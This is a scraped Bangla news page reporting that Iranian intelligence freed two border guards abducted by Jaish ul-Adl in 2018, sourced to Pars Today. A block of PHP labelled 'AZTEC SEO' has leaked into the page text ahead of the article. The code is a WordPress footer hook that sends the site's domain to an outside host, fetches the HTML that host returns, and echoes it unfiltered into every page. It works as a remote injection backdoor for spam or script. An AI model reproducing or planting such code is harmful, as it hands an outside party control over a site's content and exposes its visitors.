/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সন্ত্রাসীদের আস্তানায় ইরানের সফল অভিযান; অপহৃত দুই সীমান্তরক্ষী উদ্ধার | Dhaka Sky News

‘মিয়ানমারের কয়েকশ সংসদ সদস্যকে খোলা আকাশের নিচে আটকে রাখা হয়েছে’

আগের সংবাদ

ক্যাপিটল ভবনে হামলার জন্য এককভাবে ট্রাম্প দায়ী: প্রতিনিধি পরিষদ

পরের সংবাদ

সন্ত্রাসীদের আস্তানায় ইরানের সফল অভিযান; অপহৃত দুই সীমান্তরক্ষী উদ্ধার

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 3, 2021 , 10:26 pm

ইসলামি প্রজাতন্ত্র ইরানের গোয়েন্দা বাহিনী অত্যন্ত সফলতার সাথে সিস্তান-বালুচিস্তান প্রদেশে সন্ত্রাসীদের একটি গোপন ঘাঁটিতে অভিযান চালিয়ে অপহৃত দুই সীমান্তরক্ষীকে উদ্ধার করেছে। দুই বছর আগে সন্ত্রাসী গোষ্ঠী জয়শুল জোল্‌ম ইরানের ওই দুই সীমান্তরক্ষীকে অপহরণ করেছিল।

ইরানের ইসলামি বিপ্লবী গার্ড বাহিনী বা আইআরজিসি’র স্থল শাখার জনসংযোগ দপ্তর থেকে দেয়া এক বিবৃতিতে জানানো হয়েছে, গতকাল (মঙ্গলবার) রাতে ইরানের গোয়েন্দা বাহিনী এই অভিযান চালায়।

২০১৮ সালের অক্টোবর মাসে সন্ত্রাসী গোষ্ঠী জয়শুল জোল্‌ম ইরানের ১২ জন সীমান্তরক্ষীকে অপহরণ করে এবং তাদেরকে পাকিস্তানের অভ্যন্তরে নিয়ে যায়। অপহরণের মাসখানেকের মধ্যে পাঁচজনকে ইরানের কাছে ফেরত দেয়া হয়। ওই বছরের মার্চ মাসে আরো চারজনকে মুক্ত করে আইআরজিসি। সূত্র : পার্সটুডে